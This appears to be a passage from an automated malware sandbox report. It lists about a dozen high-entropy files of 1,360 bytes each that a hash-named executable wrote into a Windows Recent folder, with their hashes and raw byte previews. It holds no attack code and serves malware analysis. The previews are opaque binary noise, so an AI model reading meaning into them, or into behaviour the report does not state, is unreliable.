                  Preview:NIRME.....|j..........6.A.IFj..../...q....4..1.@-.9......9.......{...0...7..;..D.W.....".....^..k...:r.....B.hy....C.:.-.K.@.H...zK......@.s......=....6....:.+...I.......q|K?..._.dy...c.Gf60+^..V.._..~..0O....,.0..}...l%..J<..a..Q#.Cic$mB..J.+..U.i)lW.A...(.....{.-.Z.:.1];E..U.....cULG...R.W.'........]....DG.W..1..BlSE:..l...$.A.....BX`JKQ.9.H\m..U....[.&M.A-...._....S5...NB0.SR.%.]S2o....U..t.......#X.b.j...2..,..O...S..f...W ..b....jzM*...J....|#L.".H.Q..]5/5...\..._)....z1m..a5&......<...1.U.mi |.X-..?.......F}...s..;y^.`>..j........e..|-,J{.I...a.?.F...........u&b.2G.K.2k.....%.NCK.......0y.%...K.j9..c..>RX ".,A.8.o+....\.k*.............%+}.1.k...m6....%.0N.i#2L.AFO.....8.."..I...&..........D.....v.Q....&4...8B(S.~]......P5*..hLj9.E.#.(..q.[d9r...n;+...z*.Y.c..&.i..`.q.r..M!rw.....Th.........Q.y.z)..1.wo.!A~qPQ...).....H"q..^.....K...w.h.('...X.O~...... ..0.r..M...I..7..O....|..:r>.4....X.y........99.....<.|l....!7K.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850087405564854
                  Encrypted:false
                  SSDEEP:24:5Wo+emARl+hG9kVJ2BRRos5ytrsGCj2msnpa1mv6FSdHVTjwOScICP4k3zbD:YoAARlj9kVJUis5yFsz5CULSdHRkOCCn
                  MD5:5214FC3C9ABE35FDD09105589DD2B20C
                  SHA1:DAEECDE03F9707A6D082182705A4D75CBCD97E53
                  SHA-256:B7CCF02C3EC34471256BB6A358C9F35281BDA5A8BA5FFFF5C9B92C36DAB2FBBA
                  SHA-512:9F589DB38C5DD62867C36EA24EB0907A993235B9F2454A076ACCA084D81C17DED75BDF9AD41C3FF890E105482892B0241489908F999FEBC130D614ED9682A164
                  Malicious:false
                  Preview:PWZOQeMEK$.Q5)D..n.......n..r.<.."2...;9....x.o....t...$...6..=.'&...|e.N%m...e.'.5\.U..c7.\.......-a;m($n...$.>n+~=..A3v.N...ea.H...;...G}W...aq.FX.W.'......."[p&.B.......h.(=.<.s-....GO..A0v....9d./J#...+*.........tkCK_\.....N....>5!......a.."":..:.x:.r|.K.%....B..U.P..z........p...h9.C.....4.;4;z.n.....S0Y.wiU!.].....:.#n....5....W-.R...J7?.z..~.....%w...Q.y_.{Tm.o>~.O....@..G..s..4...K.;m..S..y/.t^..../...lU....hA.Y.g....G.xn.J..Ho........k..x.h.{S~...J(a..X...Rg}..Q.?.1O.5+:m.c..q&i[,..o....C'.u...v..Q...6..h.e.s.....6*'.T...?%....`,.".)...@..?m..1%.{W.X.Q.**...(..7aQ.D..&._.(~p..R.y%..H.&.q..6...7{.@}....m.@un#..H:\B.m.ku.4.q.!...cS....m&....9....J.O..k.KX.<Z........S..UWk.B*......bu......~&Y/4..e|..Cl.{Q....8t.......a....be...|.}...eg.....Q..W.......Xr...'......L..B...7....k....D....(..(&..[..|.... ._..a...d..bN.\9..s=5....$.P.h4......l..h.d..g...k.e41..[..O|.086..{......p...&.,"%....2H1]..W.">.S.+..nh......e.>....I.s&...H..7....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.867498157873056
                  Encrypted:false
                  SSDEEP:24:D4ctQ0l0DEmX6MijBbCUGz1ScLI0UjMcwZ4Tpm55P7hZT/y62JkofQll9u3zbD:D4ctp0bqHuU21+HwG0vrDy/Jkl9u3nD
                  MD5:49CBE5EAA022BEC8668386FB37F5E042
                  SHA1:29FF4CB652DC4BEEFD80301043070C490BA92661
                  SHA-256:B186CA8867CF5A029955ECBA19318D5BF4DB42C99F1A12FA34058F68F699DB78
                  SHA-512:DE58C742A1EF4EE280AC29B29A4A434B994E1EFFB9A23E32BCFBDD761C4BE547B0772FACDA538DE70A371410DEB1D2FB51AE055B8D661FA955349EA49C54AE1C
                  Malicious:false
                  Preview:QFAPO......ld.H./.P.Xb...A....r,r9....g....J.A.=.~.b..}...y.G.~..+..........x<.L.8.....s1.....eA.n..R.I.......V..n.Az{.....h.\.}fK5=Er.t...F..r.E..?(.=Pm..qR....2..I..Z.....e]J..]....G..J.}.:......E...i(d...?0..L...).........E.t.G.f'.wFj.c.F'+.c..YN.xW.i..3r..U.s..m........g..u8..~t.a.......b..^. f...:.L.....Kz.3..W..4<.Z..+9m.d~.F;h.v.cQy..Az,.e.R.:.B.f.I.A..d":`K....8*-.S....*...k.....N1...8..B4....J..f......h..Q.....!....q. ..G$...T.9V.Q.m..1...)0.........n...^.7..f+..pY.xhc2.^+...n.9].dV...p.&.W.......u..u.."S...=...j4......N..5.V[.}.......<J....yXI...<....r......=.q..=...={a.@..#.X....H..[)..x.-z...9.h.....4_T..im..a........h..oh..O*v".Z..$.y.Z..wl..~.m.mIq.!!...R.........v._.#......nw....'..!n..w...5...0..Ar{%..!y.g.....?..jqF..L....Z....m.[@5o....hR../.H..u....*;.v.......Q..1....C.R/z..##...|,.h...l.8..n.Z..GCT/Z.|...|..t1..ZV.K.=......5.lW.Q...5.6<6.[]...q...|<.].5...Z.j.R...b.j0..o8.5...=T.vV.8:I%.....;...f.b....s@|.....8

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849059742972895
                  Encrypted:false
                  SSDEEP:24:q4SJM/znHTwSyxLIjZ6MRgMlguBFpZHEcuWCR0O88HBl7PxB+iYa0WdxVy3zbD:q46M/X1CmHRgMlrBFbq5TPmiY9iy3nD
                  MD5:EADEF1B72857535B1241FBCA463D4A04
                  SHA1:59F95921DE0ABAA8807F5F3CF99453F67482242D
                  SHA-256:0899E7ACCCAABEF5366029361B5CCD84722D7E04B4D513C688892570B33F6D59
                  SHA-512:7371041799B35DC40F6C58D656893CD55F13C32CF8DB5A37EF9186CFA57C337D92C44B04F066B239F7147566FC4E5AE169B94E25C06D028987A404026A53F71C
                  Malicious:false
                  Preview:QFAPO.D.B.'f.i.....M.i..!g......L.M...]..-......G..p.;.....b_y.<,E.D....<.5.....v.v..L..C.e..+.............^u/..x.4J..M.E...L".....y;...r.,&^..6.v.M.....W..;B.BN.,....'..x.8.E.O...).>s.<...T....I..I$..<...x/4......L.!....X............k.a...meD...8.5-.....y....i....-t2#.......3..74.N.6.C.L.{..J.v.\`...L.F..r0X....%.O.us~....}^.{#.EW..g.c..:.qY47..1KC..o^.;0.A....:.......#A\b.0...$oI..N=v.#g..r....5...G.........{..<?lMp..8..3..gSa.z....`;,.M....E..1..T6..........$..!..V9.o6.(M.i.E}.-..?.."f.z.......I.%%.?...~..7..u......BO.[.O./.<-.x.w..-hX.)...<....@!2.o.0Y1....(.......Y...Zo....dg....%V :...O.1t..W..b..m.;.=..U..;.e...=O...0..D..F.....2...Dc......;.!]..>.p...D...f..i.......d1..e...4.....N_...z....K.o..g...".eg..K..4...BQ.>[.......~..iG...d.....Ii.M.Y...G1.....=g?.=8...P...kV.)*.1.....Y.s.5...,.(k.R|...'..S...5......P..&..P........u...`.9...\..s./N....3n.Z...`~..'@MT4W.;.......;xk......k..c..;.5.^...y..'c...q.PN.+s,..S@zq[....J

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SBVUSFKOGN.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.862863296423055
                  Encrypted:false
                  SSDEEP:24:Q/vzArt1VblUEQRPNzawaKw5YXXrtNEh4UMgWxvnJiFKade0nzBP+vua483zbD:QH6tnpuHzvaNSXXrt+SU3vKadeqBWvuO
                  MD5:93C9372DB8C5092F81FF561DA37F4C23
                  SHA1:16632DAE28F607F01FD23093A0883A6BDF3A16B0
                  SHA-256:7C12889A76010D1EB5B97665592FCEBF540380FD04F20A15E03F9A113E920E2F
                  SHA-512:6E62F42F3BDABA84C998405D9A3F6A43A61D5ADD42D81773772542AADCDA151DDCEE050C6FAB996830977B6438EFD76F4A126D07796313FD130BDFD4E2A7037D
                  Malicious:false
                  Preview:SBVUSg.g..8!#@r.(x....b.>Mx........F~..%5.=;?...,;.._.4 ..&.."...].....]..}..]...>.t..U.G.........&...8-M.O.O..z..;..c.{(.....J.CccNG` ..~x..8#.<.g.UW.lT.<..K8.+....Nwe#.+...rM.1..~..N[.2....,yL.C..5.....{.F.I.r..._...."s..O"tg.z...n4rz.[N.(.(.J.l..$..Y..N.../..Yv.:..........1.:.....B...w......1+13.y.T.T....9l_... .%.a.r..b..)...x..w..3..q...|%...mqt..=M@...`3...k.R;.`.gM..2"..}..wz....>..&v7.^Q7..c._...y.=....Y....X.[h....W.[jZ~..k.B.K^b.4.Dt....,.....{...p..e..2`......$..ni..E.2.1....e...."....k.(.`....NI..C..{.L..r...oI..l7W...(\..1..+.1....R....j.@.'=...^V.....^.....V..=.Q=V/.1pv....n.*.ai1..lO.]./..ch.,5d.."..V...7....Gc...J......<V....AH.9i#...5A...#..jS..P@......cc..,@..7....&.X..Y.D..y.'.x.Q..{....<.tm..a.>..V....McF~......v.).........Q..U..........v.8....y`...P.i......%....)=......r.....V.....^f...U$..59.!..|+.U.s..Ej...K..._.....Y...x`\......[g6rfJ..s....ky.....)`;_.@..e//..q.O.h.(o.j.M.o..hC.1..>....t.n...O.R.>..dtKk.N_'.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.851473956541967
                  Encrypted:false
                  SSDEEP:24:CirETKjjMhrrs5PBt0ii64Jtliv4yLCQur6NAtwFnjXhlzbMHGKpE/4VCt3zbD:rrrjYrreBt0D64Jg4MCb6qtwNjXhluTU
                  MD5:8105ED331229B7051A642D7194AAEFDC
                  SHA1:82686FCA51E77F267FEDB3628F55BB124A0315A6
                  SHA-256:50213F97EF3ADA8A9A0244757DEA86FA52BC01E4F3C13DAC74E7E3931B530555
                  SHA-512:0B293E64FDBF387C20F376A448C7FA4FD8B2918872FF3489347D99E37B288C1F5D63685DA67128B26F9E44988B8E8532FF450319BC1E0EEDF406B76B1BF22A9B
                  Malicious:false
                  Preview:SNIPGg.%.Pu.=cfI4.6<..F1.BH.(.......Z'.....j7..sW.?s..m}....2M...c....$....}.....9he.{$.3..8......@.~.1..[Gar}...wd.G^...N.3u....T=:..hj..J..v....-..D<F....J..?....1c..>x.f..^..k.?.CB.4k....2).&i...l.W..^.%........`x.yjC6...h.......T.y.I.Y..{F.)..e..@.aHk`".mI1..RZ....qX......:...DI......*.w.DP..........b?.L.D...hN..........(b.7...E..6^.^jN.s...8..Z7[.Lw.......!..+.b:l..)..A.M...P.9{.....P.O....C......p.tfS.XW....t.F.E.P.....=.!...e....H..U.E.-g.7......f3]D...W..A.9..........'7.?...TW..._...n.|..g.<]..RyU@k_....../....2..bD..`...BG..:...J..u...G.......N..^u. ..$-\...)..$....l&.8.R...@".......S........6x...l.".h....2].*....6.c..?..e ..5.dl.[...X1..5$.}..[.\S*..GG;..O..g........4g.O.........B.w_kG\k...^4.........^1T..3dB...p.}9.a....yg&bO.~.GmE.U..H.$w.. ...T..Zh....s....ag.S7J.........z.`....O...V...f&C..xK%r..]..j......*.(..COz....2......x]..gjY.Oh..+..h...\....k..I.....>.i....xh7.)....|..>;.*..3.....iw[..!<._.n*.F....(.~.#.1.5~..Fu

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UCKFKZQOSO.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8551831160154295
                  Encrypted:false
                  SSDEEP:24:1OFgWL1LyTMxVH6hyOyYL1rtXsUW9KL1/MrT390il1tB6+P0SVP/f03b+yB3zbD:1OGWMeVsydmu0dMrTCelhe+yB3nD
                  MD5:C41E8297881936FA62C75CC348FC7196
                  SHA1:27163B9CBAEB1D24DBAB69CAA647EF02C7617B8D
                  SHA-256:FC16D989F8D1C850AB765484043161D2FA6DBC47833F8B9CA8B2957CEAC897D2
                  SHA-512:BDB7374A439E20EEEC257C69B4C0AE42E42F9705E7E5055B6E274E5A39A12817CBB6E097321598DE290F284FDEA90C463DD1A6A2146F7386D73E9629C5AFCA22
                  Malicious:false
                  Preview:UCKFK..>(........K.Y..;^.Sh.2........7.v>.H..\.b...j6."...a0&.N......C. D............?..)...I...7-....zi.'..n..".:....#.3.....6.........k.'.dYh.....h.*..oN_p...>.3\L..A...z.TTN.G.D....8&O_.............+Q!.g.......Q}.....H1A..+.Xb...........l.>...G.(3{X......C.._.T..Hk...!...7..C.(.c....v.P.-Z..^...2b.O..`..6......~.....C..!e....C.K$.. ..1..AU...m.s....).mOm....l..n........o.4U...j.....mY?..Q)...kL.u0.R.D4z..1...1(...pn.JJQ.M.y....8....Q. .H.,.Ml.......p....Wj....}d. TB.>k#S...Z!.s.U..O.lW..g2p...L/..U.]....E.q..ke.s.K(N..x.O%...EZ....l...8E.8(....|...I.s...XCW....D...kDp...t.J|..6..!.gp.Ec..$]....1.B_we..<.gn.K.U.....Xj.~k..k..A.w.e.8U.@}.7,...../.;.....VkbvB/1.6.J..B..%."De..aIy..8?..C.4A.YRC.q.....[zj.....e.;.X....9.......M.Sw...q..Iq ~.......5WD...^..n.uu.s.@..p....)`..C;%.'....7.4........\....y...T..t..S.M.2.i.3W......Bm9.E..V..h.,..|...0.>.....u.@r...DF....../....:....(..L".^AJ..c]..V9...t<...(..N.0..)...UD....=s..u....W.w...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UCKFKZQOSO.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847609168557958
                  Encrypted:false
                  SSDEEP:24:4Az/g6WbCoRVl4aZRZUsK8qxPE+4d7CrPMPlgb/mYlZ1sZFtx3/YT3zbD:4A3WmoR74+ZfK8Ic+rUPiKlFv3/m3nD
                  MD5:57A4D63D985169F8A6E1FFF38789DF4F
                  SHA1:6EC197708EFEB4B5EB208C2223AEF9C27021CC23
                  SHA-256:202D2D54DA54D639F6CF6DFE2502A8F3126F0D8E0C84CC32171DCC2166A5D373
                  SHA-512:33EDA32BA163EE1061FCFF4E4B0602B147BAEF15FA2E7F200B8D6509E9E7409CCD139A7EA7C8F4CE52370577B66831F8D66401DB222C791184819117B85EEE4E
                  Malicious:false
                  Preview:UCKFK9.H..G.z.x.?7.Ap.`...T.I..D....i .1}...S.v[v..U+..!.W..$.W.~[bC.cL...M.W88K.>...a.e^..S$.....I."......J.^BF..Ah.t......Zd#.....w..."k..A..?.Wu.).Oh..q...R$.._.8@...d7D=... +z....c.!t9+.x....K..Kf!d..!.(.f..;.Gz...7QV^=....wA...F9...}.$.M'.....l.d..]?..f..ry.*;yt.....x..(.SL8.o..TJV...b>{....J...v .Tr.:.._......HK..^.8Z..a..%...-ZcD...oCO.2;..K.T...0;...B-.............m.W..."P.F....VV.6./l.t@...1..<..i...(....L$....C.9t.pC.2..|..R<.|+T.I...._D!.+K....}..".i.)..S.e...[e..*....`d1]V.4J...j...j.(...Vs<..Z~...4.\...I.[.J........z.......St....K.420.c.C(K(.U...7>.L_.`....!.y..f.z.7..FH..x..|.......>w...%8C......iy.8..[...kw],..5.....8..o.;...$\....lo...?`J..i....I.*.....f.SJ....y.\.y..z......!S...t.DD..{O... .4i.9....w....ww.^0'...J.....c|6.,".{.x.j.2..lt.....B.gRL".J..=.....D....%p......{s.&.i(..3v:._nH....exR#....c.?^.".O#...t..-..{].S..XA.T..o....Q.O..7..f..G.YX|4F.,.P.9....vXz....e....M..yCAr.RA..z^I.KSA...'...#.....x.y.....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UCKFKZQOSO.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.854477466520025
                  Encrypted:false
                  SSDEEP:24:qAl4kHrIfG7oYahoLM88Dyh38hIj/XLqOF6SarmM/bkC7Dxw3zbD://LIO7oYahoLMluh38hW/XLqOTaiskyI
                  MD5:2BBEE34CF2D024562187E467C9604CF1
                  SHA1:3D440FD6FFC85B5B8BED9FD5FFBD80ECF699A3FB
                  SHA-256:2C033C95FD6A19158291E13ED94228CD1DD6AC3DCFCDD3C2D37BADA74DD14510
                  SHA-512:881553FC71D35BEE29FF2E980ABCB196679933D1D317391A1BFF5BBC73C94CC0FD1E15B56E2F266B9204495AC49A677DA6731DF4B1C6578B0C59A33BDB4EEA4A
                  Malicious:false
                  Preview:UCKFK".Z.V........TJBT%.............g...'..B...q.JuI..6...s-iE..`ogf.y^.C.^x..BNU.R%.f..l..O.8).-P4\..t...J...gm.....fJ6.,.O+XX......E..^/....7.rc...._..].Nv...D7Y,..<q@..[h...)......%9.C...g.3.)...G...V.8b......=G...k......R.5 .[kwm...sy.E..].pM...J..v.`..=.kO.3.QE.......M6{).~..RM&..&..~................SM..../..j..OUi5.x"....g..$...j...~...@"]..9.....9....[..M.O.t.V.i..be...z.`.*%..8.....w....'....!{........'6U:N.m...J..s$Fh.@h[....A..s..[.....E~b:..$....(.v+...~.bL8...G.6(_.X.P..E..=g].5l<?.....>..........(..f.ecf..r.... ..{.......%.)..1...^..+@.8...l.....?>_..6..XK.2v....]$........7..Z"...<...6..|..pw.#.h..8...I..i.Rk..9....~.n.G.j~*..+.c.]...).............u%T*..d...l.%.yw...V\....G...q$.X.I..d..b;.O.P.t....0..D{.....Fo.._Uo.&........)..^......l.rot]3@.....Y../PL...2s.%p..h....|.....f&=..g.....n..-..B.U..h..j.`.=..Q...x...J.t...._......cHL..U_..:FibU..S.........4....w.;,a1E_.Ft.....B.|s.q.Z....po...I...q.|g.\w..0z.w...:t.j

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.829489198081417
                  Encrypted:false
                  SSDEEP:24:UeKg9vwyxuqfV+HkiqH1Wal2qWeachRB8mT6TdnOr3nmX3Lr3zbD:dKSxJd+EijnyRB8ae9ynmX3Lr3nD
                  MD5:FFA91C33938904717A98C2FB44BD307B
                  SHA1:0FFF238F91F6B2EDC060492183568396B564CE46
                  SHA-256:4051629D6C3406D6B96A74D201F0F76DB8498E3BC1994C386FBA7FDF0474660C
                  SHA-512:83E59598EA144BDCD11D7E2BE2927DC707D5EC42343003BCF89CB7EEAFF479F0A67366A3ED6772A4E520ECCA7A127C582E93BB1FA505D1209154FC105AED6DDD
                  Malicious:false
                  Preview:UNKRL.:...{D=S......_..z....e.N.d.e.J-. ..G.#..G..@....].vB;...c.F.....Pz....<.7.B.jQ..i..W.17...F..XG....2.E....=&..o....>/@.v4.%D...`....C..(.v#y....<....E........SA...g@=...$....6.b..0.d:...(.{.o}.o.^OX.A.........O.1-.DF..j.:.c.#,..6P4...f.cTU...?.....7.......Y....1.Uu.(..q(...>m..f ...~}9.Y^...=....2.}5.n.`........l...v~.o....?Y.L...Fwq.....FP..u....6n.uin-Y...nQ........[..!d..A8.$amA.Q..Z)._3.".-~.(w..W......t...vKF.a........M*g..d...w..K.~...IP..8..F.....IB....$.]w)..2|o..7t.Ip.e.;..u.;8...P...Dz.2[.".Dp...a...............3H7.R....@....._t.tC t......q....t..xia[gO...FR{T.P.E....:.u{....~o.R.....*G..4d.~...=i<?....S.Fp..q.\p...........eWL...(-..E...N.q.(..1..(.*.hU... Ut....8.f\.;..A.>n.F.5..b..f:.....L...?.0.u...X.J..urMV.lE..g..e...x-`./....In..e..O..R....t.. .../Da.._."&...t..p.....\iEX..v....6...u..Q)..L....i.Fz..._..R(.Q5...@"...I8..9...tM.v.I..n...&.y^...].S.xhv=......AF.....A..Zt..._BUr..t...D..|.[9...._.c...Iy.w...t..^P(...%V....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849848736245404
                  Encrypted:false
                  SSDEEP:24:2+tUMi6ixXNISOYq1uEoa/fOAqPt/G4HYHDMEjAgUhJ0jvIgtAXFtNjDOZHGKGYe:F2xXjOHNXfqF/G4uD/jAgmCjvIgtAXRZ
                  MD5:D765D5D383651E67028E132A8746A98A
                  SHA1:A3AA96CCFA408D7BFDB2D6261494B82FAD8520F6
                  SHA-256:D8815DE21FDFEFBB9CCB9B7BC40DCD47B0AE43619F5B97FCF922DB31204552C0
                  SHA-512:B27169EDE67019AD0571E946B3E490130444ECDF6846F15D1F0F584A5E52931FA61D7288D0F2342155D4571567B198A86E6E0236A87460CDC05EA52EFDDAAE78
                  Malicious:false
                  Preview:UNKRL.b......x.lnT.D..#.v.......C.y.....&h......Njl.p$ |....|.%.>R3...D3...6.D..?...'..Z..5......[...ly..YS.d.I.WA=...c.Lw~..R9}T...lm...a..lT.....E=...Q$<@fD..)......}p..1.M[.O.0..6.w........+..4........?.....~b.o.#...[..h.j.X...9$.i....._>.1....[..PAB...4=......h..L.E....=..q.\.h.P)n....q..K....Q.....R...3.!r..V.{......HS-..[........=.....S...X#.$....jMr.[....."../ZA.!.0.k.3O|...wj;+.....E.l..;..s....1T}....p..,...|.:a......T....W..#........K..g..g?..2q..^.m.<....z\.8*j..x@..cPS..k.C.dy.6..B..x.....?=.!.....=..g.-.T...k).b.lgz2./.s~.Ym...?.e..,....+..t....5..-_.X}T.I.....7......B.H..~...%4..5.Gc..".?..G...%)..]zL....K.".v%.:..6z.6m....%~..3#8.m......8.>.j...e.._3....{....\..R#.......Z...Q.m...!2..{...(...QzMW.,.q..;.@I.r.:..E(.....fZ.k..(c.m.g.p._t........p...3.V.;.".\6U..+..C...@...n.s.nr..I.d.%...%.....^F.]. N.......V}X-...3..b.R...{.;..x..6..|....(v..<.I......K8?. I$7..J.W@..[j@......GK.).7..]tS.XG...].0.o4Q...6...S...a~N.....hq:d

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UUVPAKSIRG.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:VISX image file
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8336544381718
                  Encrypted:false
                  SSDEEP:24:6rpoqsN0c6gcT1fgfGaWNXWz9rgcUDToPx2vUylzTkdjiQwY/L/Mzx43zbD:6doqU0Lg64qAz9rgPDTwaUyTwOQwYD/B
                  MD5:9BB00DAA9CBC0ADB40C3AED86F7264EF
                  SHA1:BBA5A6D82CBFAE6D9E28474868EB4AD7F91367F5
                  SHA-256:43E2FFD053699547C7E0FD8F444D49746FC1579DF3D9085619AF7F6FAA40553A
                  SHA-512:7031A4B83EA09A0A66F9A5117ACDC7B5B1E417D00821C35B72E2C01EFBA7C0A1B04F27C53DA7CFD7CE171FC6FEA74DD5703899C6C8B0CEB4FFD7CB0B2248D707
                  Malicious:false
                  Preview:UUVPA.D.AC..g._.M..E.N.2U..I.#..T.9.bv.E.B....r.2..*..\.k...$i\f.].6.X..l.....d........5.........P..g.M...s$...W.....58.x..##.%)..&^....k^}IT.J...^.v..KIn..c....m.L...7......{.,..|....%..(CD)u.....]~......wl....#.:.......p.+q..j.tv...@.zu.....*.82.idR2..i....'i..1..Te.l......sb.6..8.'g.V.H.A;b>.|N.G].6.3"-#...............D.b(...8..5\X..l.s..b..x..o..r.W.5..q!.....m.........:.W.eF..,.X3.l.z.....^...m...y`I.@.e..m.........0."&..G\)..Y.*z;9.C...|.#.ny...sb.F.&.........&...9..%%gv;.IU...2A.C.E.YF......P.x....)D....&}.?......4......6M.5...xfz..<a.[...u.UoE.X}....B.........PD..9y.I.....v|.6....q].C#}K...v1..%...J.&l...f........we..-...'...6g....$...U.t.|..%P....O6..{. ..5<..6`..Q...NH..uCI..;.LEv.B..;]....wH..9..." ...........t......]...d.p..'...l....NT.....>..i.^."\....a`F.....O....f9...o..X...!w...'r[.'5.*...Z.7.'...g..2.>7C.....H.......a....x....q.i.#..5..[.a.>n.ut..}........<..l..@...F..........'...$.v...k.....+..Xp..FII........?O.Q.._SX....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WHZAGPPPLA.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.835977069125858
                  Encrypted:false
                  SSDEEP:24:qAlh+oCa+GXlvRkZ5YlyWjr6U2iU42WJYJvBrXsTguF4MzW4eiIRPsCV5i3zbD:jhS9GXlvRC5YlyWjei3yvBbSh4M52RP4
                  MD5:AAD063F9E438F44D75E156525F56957D
                  SHA1:0D424832A526E22E941C9406CD2A34791B283A79
                  SHA-256:5C9DA6809E3E0119EA3928E5770DEB6FC01AF6B287E26F4318ED85A104752917
                  SHA-512:BB1DAE3517A10E416C3CFEE86D7CABF1C31708A1EB79FCACE4CEA6123F42AF32B847FA8303A822B788A5AC77C7033AF813909A4D81F8BE96190912CF31E89D1D
                  Malicious:false
                  Preview:WHZAG..e.x'Co.....z.....lPrr..>o,^.1.{..5=...?.&.J..k,.+wR.?C....:V\p..I...D...!#...%...nGC.eS..i...B...9...Kz41..n.@.t...T.QJ"|,=.@...S.w..........M5......Pl.p......x..i.|.N...0....k..|&.........2D>Rc...I.OQV.w*..L...K.;._.....hmJ.......a".m..pCZ.`..0.q&......._w.V"....0&...gvr.-...,g.`.f..>.a.f..Y....6.rl..n....5@..RlDY.......U....I...=...5..1~..=......*m.^.r.F..7.x....6..{7..JN..[..p....z.D./1t.N....3.o...<?.......m.&...!...qm=..9v.........8..Y6Rk..YE.6.qJ.z...>.....Jgi.tO}.@vq.#..=f........a8";..h..g.C.h".e~Al.....!.x1{.|..9..k........._V@6...=...TP..*.1s.J.A>.m..zb..) m.B...........qy}1.'a.gB.Y....u.&-.IB.M/..EM.....z<..H..v..........L....ug.?..|0.o./.Ha.......ye......b.s.....THh..f...xJ.t'..M.2...`.-.P}.. .{.qr...k.M...j...1.....W...1.-.r.W....}Z..#.....ki..A.0.0.e#.F..3...D<....*M.e..`q...P..q[..H8~e.m.Q.F..~8....s'....\...D......m....U..O...:\..t...+\.}l......z..3..C...RM......N9...1..{.K7k.;.n_#..!..&...|"}..$.i&.......:\:. [...._.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.851361929921755
                  Encrypted:false
                  SSDEEP:24:XME+KEs4L8LP34BF7XD5EiL7wJjfAdUWakKQTTvdhNnaZeJT/+3zbD:jJEML34F7dEif0IHaXQfvXNa4+3nD
                  MD5:70B804B488DC61280B604011915092C0
                  SHA1:E9DB2E4093D08A2FDA884A9752336E888E124069
                  SHA-256:74BCDAD517083D60114321DCA0C6215C29BEFE046889124215D9161DF7A76AE0
                  SHA-512:A253CAB01D94D209E589776DA37C9E6679E81FC1AA9F64638716C3A3A0B43DA9C93C23348FCD38C1F24E03050B12CE6A88C9B4DB77C6E54C49C69C35CA79ADB8
                  Malicious:false
